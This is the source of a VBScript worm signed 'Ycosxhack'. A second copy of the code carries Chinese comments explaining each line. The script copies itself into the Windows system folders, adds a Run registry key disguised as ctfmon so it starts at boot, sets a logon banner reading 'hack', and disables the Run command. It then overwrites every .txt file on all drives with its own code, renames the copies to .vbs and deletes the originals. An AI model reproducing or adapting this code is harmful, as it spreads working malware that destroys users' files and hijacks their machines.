'Ycosxhack [Y.X.H]
on error resume next
set fso=createobject("scripting.filesystemobject")
randomize
name=int(rnd*10000000+1)
temp=name
for i=0 to 2
set dir=fso.getspecialfolder(i)
fso.getfile(wscript.scriptfullname).copy(dir&"\"&name&".vbs")
next
'--------------------------------------------------------
set reg=createobject("wscript.shell")
reg.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ctfmon","c:\windows\system32\"&temp&".vbs"
reg.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","hack"
reg.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","sorry!!!"
reg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"
'--------------------------------------------------------
set self=fso.opentextfile(wscript.scriptfullname,1)
cover=self.readall
self.close
set drvs=fso.drives
for each drv in drvs
if drv.drivetype=1 or drv.drivetype=2 or drv.drivetype=3 or drv.drivetype=4 then
'wscript.echo drv
scan(drv)
end if
next
set selfkill=fso.getfile(wscript.scriptfullname)
selfkill.delete(true)
'--------------------------------------------------------
sub scan(folder_)
on error resume next
set folder_=fso.getfolder(folder_)
set files=folder_.files
for each file in files
ext=fso.getextensionname(file)
ext=lcase(ext)
if ext="txt" then
set ap=fso.opentextfile(file.path,2,true)
ap.write cover
ap.close
fso.getfile(file.path).copy(file.path&".vbs")
file.delete(true)
end if
next
set subfolders=folder_.subfolders
for each subfolder in subfolders
scan(subfolder)
next
end sub
on error resume next //跳过错误行
set fso=createobject("scripting.filesystemobject") //设置文件操作
randomize name=int(rnd*10000000+1)//随机大小文件名
temp=name
for i=0 to 2
set dir=fso.getspecialfolder(i)//获取特殊文件夹
fso.getfile(wscript.scriptfullname).copy(dir&"\"&name&".vbs") //获取特殊文件夹的全名
next
'--------------------------------------------------------
set reg=createobject("wscript.shell") reg.regwrite//注册表写操作 "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ctfmon","c:\windows\system32\"&temp&".vbs" //添加启动项
reg.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","hack" //对话框标题
reg.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","sorry!!!" //对话框内容
reg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"//禁用桌面
'--------------------------------------------------------
set self=fso.opentextfile(wscript.scriptfullname,1) //设置打开文件
cover=self.readall //读取所有内容
self.close //自我关闭
set drvs=fso.drives //驱动操作设置
for each drv in drvs //在drvs中查找驱动
if drv.drivetype=1 or drv.drivetype=2 or drv.drivetype=3 or drv.drivetype=4 //驱动符比较
then 'wscript.echo drv scan(drv)
end if
next
set selfkill=fso.getfile(wscript.scriptfullname) //文件操作自我删除
selfkill.delete(true) //自我删除
'--------------------------------------------------------
sub scan(folder_)
on error resume next //遇错跳过
set folder_=fso.getfolder(folder_) //获取文件
set files=folder_.files
for each file in files
ext=fso.getextensionname(file) //获取文件扩展名
ext=lcase(ext)
if ext="txt" //判断文件扩展名为txt时
then
set ap=fso.opentextfile(file.path,2,true) //文件操作打开txt文本文件
ap.write cover //写入内容
ap.close //关闭txt文件
fso.getfile(file.path).copy(file.path&".vbs")//转移恶意角本
file.delete(true)//删除原体程序
end if
next
set subfolders=folder_.subfolders
for each subfolder in subfolders scan(subfolder)
next
end sub//结束
